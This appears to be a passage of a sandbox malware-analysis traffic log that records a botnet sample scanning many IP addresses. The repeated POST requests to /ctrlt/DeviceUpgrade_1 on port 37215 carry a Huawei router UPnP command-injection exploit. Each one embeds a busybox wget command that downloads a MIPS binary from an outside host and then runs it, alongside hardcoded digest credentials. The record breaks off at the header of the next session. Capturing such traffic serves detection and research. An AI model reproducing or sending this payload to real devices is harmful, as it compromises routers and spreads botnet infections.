                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            119192.168.2.144135841.60.252.19037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663675070 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            120192.168.2.1442332197.160.179.4237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663685083 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            121192.168.2.145386041.117.177.18437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663711071 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            122192.168.2.1454158197.75.9.6237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663734913 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            123192.168.2.144240841.201.118.25337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663769007 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            124192.168.2.1459080197.35.88.6637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663780928 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            125192.168.2.145042241.122.39.9837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663794041 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            126192.168.2.1452978156.59.140.17037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663829088 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            127192.168.2.1446688156.146.20.19437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.663855076 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            128192.168.2.1446878197.74.88.21237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.674865961 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            129192.168.2.1446504197.2.165.20237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.674905062 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
